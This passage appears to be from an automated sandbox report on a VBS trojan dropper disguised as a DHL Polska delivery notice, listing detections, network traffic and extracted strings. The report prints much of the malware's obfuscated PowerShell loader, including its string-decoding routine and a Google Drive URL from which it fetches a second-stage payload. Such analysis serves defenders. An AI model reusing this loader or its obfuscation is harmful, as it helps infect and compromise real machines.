irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNo

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49739 version: TLS 1.2

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: powershell.exe, 00000005.00000002.3019849567.000001D06F29C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: wscript.exe, 00000000.00000003.1692594649.0000019747627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca6d2a1b68f47
            Source: wscript.exe, 00000000.00000003.1692245556.00000197493F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692872277.00000197493F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692717937.00000197493F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabZy
            Source: wscript.exe, 00000000.00000003.1692798831.000001974764E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692594649.0000019747627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ca6d2a1b68
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPB
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D05856A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-s
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-sr
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srW
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9W
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9Ws
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsT
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTx
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0a
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2N
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NV
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2a
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aU
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUm
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmn
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3V
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3Vq
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3Vqy
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyCXR
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh8
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D056FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1y-srWy9WsTxO0ac2NVg8A2aUmnT3VqyC&export=download
            Source: powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000005.00000002.3017587099.000001D06EF80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
            Source: powershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.161:443 -> 192.168.2.4:49739 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_6160.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5002
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5002
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 5002Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91 Cygnid Hemiteratic Orthodiagraphy217 Malleolar lovreglens Aflbsledninger Sagsaktens Traadrullerne Nonscalar Nondeclaratory Yawnups Abet226 Stammefejderne33 Avitaminosis Aabenlyses Fusionsmusikken Earthworms kursusmodulet Bolledejene Rollefag Eyras Windowshopping Usr Disboscation91';If (${host}.CurrentCulture) {$Clairaudience++;}Function Trosfllen($Gendigtende){$Statshemmelighedernes=$Gendigtende.Length-$Clairaudience;$Prehensible='SUBsTRI';$Prehensible+='ng';For( $Bilkberne195=2;$Bilkberne195 -lt $Statshemmelighedernes;$Bilkberne195+=3){$Cygnid+=$Gendigtende.$Prehensible.Invoke( $Bilkberne195, $Clairaudience);}$Cygnid;}function Extensionalism($Medullitis){ & ($Impotens) ($Medullitis);}$Czardas=Trosfllen ' OMVroM,zBaiAalR.lA,a.e/St5no.Ko0Ge Br(BaWIni MnP,d,doMew esRe pNC TF, sp1Ta0 ,. E0S.;Pn ,W ,iSknS 6En4 l;Go TrxSk6Fo4 ;f, FrGuvH :Ma1L 2,a1.n.Pa0Re)B, GE,e.ecAnkWioH / G2N.0an1St0.y0T,1.b0.s1m. CFVei rr IeEnfLyoPrxSo/Co1Ty2S,1 A. t0 D ';$Preassuring=Trosfllen ' aUH sKoeOprFa-neA,ugK,e nCot.k ';$lovreglens=Trosfllen 'D hHjtOct .pAcsOs:Tr/Sa/Hod SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 49%
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C0F1F09_2_04C0F1F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C0FAC09_2_04C0FAC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04C0EEA89_2_04C0EEA8
            Source: DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi32_6160.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 8096, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal96.troj.expl.evad.winVBS@9/7@2/2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Democratising.SpiJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
